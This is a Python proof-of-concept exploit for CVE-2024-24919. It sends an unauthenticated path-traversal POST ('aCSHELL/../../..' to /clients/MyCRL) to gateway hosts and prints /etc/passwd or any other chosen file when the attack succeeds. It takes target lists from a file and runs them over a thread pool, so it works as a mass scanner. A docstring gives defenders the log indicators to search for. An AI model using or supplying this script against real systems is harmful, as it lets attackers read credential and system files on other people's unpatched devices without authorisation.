CVE-2024-24919.py
#!/usr/bin/python3
import requests
from argparse import ArgumentParser
from urllib3.exceptions import InsecureRequestWarning
from colorama import Fore, Style
import re
from concurrent.futures import ThreadPoolExecutor, as_completed
# Silences urllib3's InsecureRequestWarning, which would otherwise be emitted
# for every request sent with verify=False (see exploit()). The requests are
# still made without certificate validation; only the warning is hidden.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
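def is_valid_url(url):
    """Return True when *url* has the shape of an http(s) URL or a bare host.

    Accepted shape: an optional ``http://`` or ``https://`` scheme, then either
    a dotted quad or a dotted hostname ending in an alphabetic label of two or
    more letters, an optional ``:port`` of 1-5 digits, and an optional path.

    This is a syntactic check only. Octets above 255 and ports above 65535
    still pass, and nothing is resolved or contacted.
    """
    # The scheme group previously also listed ``http?://``, which makes the
    # final "p" optional and therefore accepted the non-scheme ``htt://``.
    # ``https?://`` alone already covers both http and https.
    pattern = re.compile(
        r'^(https?://)?'
        r'((([0-9]{1,3}\.){3}[0-9]{1,3})|'
        r'(([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}))'
        r'(:[0-9]{1,5})?'
        r'(/.*)?$'
    )
    return pattern.match(url) is not None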
def ensure_scheme(url):
    """Return *url* with an ``https://`` prefix unless it already has a scheme.

    Only a lowercase ``http://`` or ``https://`` at the very start counts as
    an existing scheme; anything else is prefixed with ``https://``.
    """
    has_scheme = re.match(r'^https?://', url) is not None
    return url if has_scheme else 'https://' + url
def exploit(target_url, path):
    """Request `path` from one target and print the reply if it looks like a hit.

    Sends a single POST to ``<target_url>/clients/MyCRL``. The body is a fixed
    prefix, a run of ``../`` segments and then `path`. The request carries no
    credentials. A target is reported only when the reply is HTTP 200 and its
    text contains ``root:``, so the success check is tied to passwd-style
    content (the script's default path); other files produce no output even
    if they are returned.

    For defenders: the request path and the traversal sequence in the POST
    body are the indicators to search gateway and proxy logs for. The
    User-Agent and the other headers are fixed strings in this script and are
    not a reliable detection key. Hosts that answered such a request before
    the vendor fix for CVE-2024-24919 was applied should have any secrets
    readable from their filesystem treated as exposed.

    Prints to stdout and returns None. ``requests`` errors are caught and
    printed rather than raised.
    """
    target = f'{target_url}/clients/MyCRL'
    data = f'aCSHELL/../../../../../../../../../../..{path}'
    # Static header set; every value here is a literal except Host.
    headers = {
        'Host': target_url,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0',
        'Te': 'trailers',
        'Dnt': '1',
        'Connection': 'keep-alive',
        'Content-Length': '48'
    }
    try:
        # verify=False: the server certificate is not validated, so the
        # response is not authenticated as coming from the intended host.
        response = requests.post(target, headers=headers, data=data, verify=False)
        if response.status_code == 200:
            # Heuristic match on passwd-style content, not a general success test.
            if 'root:' in response.text:
                print(Fore.GREEN + f"{target_url} VULNERABLE" + Style.RESET_ALL)
                # NOTE(review): the page lost its indentation; this print is
                # assumed to sit inside the 'root:' check - confirm against
                # the original file.
                print(response.text)
    except requests.exceptions.RequestException as e:
        print(f"Error exploiting {target_url}: {e}")
def process_target(target, path):
    """Normalise one target entry and pass it to ``exploit`` if it validates.

    Surrounding whitespace is stripped first, so lines read from a file lose
    their trailing newline. Blank entries are skipped silently. Entries
    without a scheme get ``https://`` via ``ensure_scheme``; entries that then
    fail ``is_valid_url`` are reported and skipped.
    """
    cleaned = target.strip()
    if not cleaned:
        # Blank line in the target list: nothing to do.
        return

    candidate = ensure_scheme(cleaned)
    if not is_valid_url(candidate):
        print(f"Invalid URL: {candidate}")
        return

    print(f'Exploiting {candidate}...')
    exploit(candidate, path)
def main():
    """Parse the command line and run ``process_target`` for every target.

    Targets come from ``--file`` (one entry per line), ``--ip``, or both; at
    least one of the two is required. ``--path`` defaults to ``/etc/passwd``
    and ``--threads`` (default 4) sets the worker count of the thread pool.
    If the target file cannot be read, the error is printed and the function
    returns without contacting anything.
    """
    cli = ArgumentParser(description='CVE-2024-24919 PoC')
    cli.add_argument('-i', '--ip', help='Target IP address or URL')
    cli.add_argument('-p', '--path', default='/etc/passwd', help='Path to read on the target system')
    cli.add_argument('-f', '--file', help='File containing list of IP addresses or URLs')
    cli.add_argument('-t', '--threads', type=int, default=4, help='Number of threads to use')
    opts = cli.parse_args()

    if not (opts.ip or opts.file):
        cli.error("At least one of --ip or --file must be specified")

    queue = []
    if opts.file:
        try:
            with open(opts.file, 'r') as handle:
                # Lines keep their newline here; process_target strips it.
                queue = list(handle)
        except Exception as err:
            print(f"Error reading file: {err}")
            return
    if opts.ip:
        queue.append(opts.ip)

    with ThreadPoolExecutor(max_workers=opts.threads) as pool:
        pending = [pool.submit(process_target, entry, opts.path) for entry in queue]
        for done in as_completed(pending):
            # result() re-raises anything a worker raised, so failures surface here.
            done.result()
# Run the CLI only when the file is executed as a script, not when imported.
if __name__ == '__main__':
    main()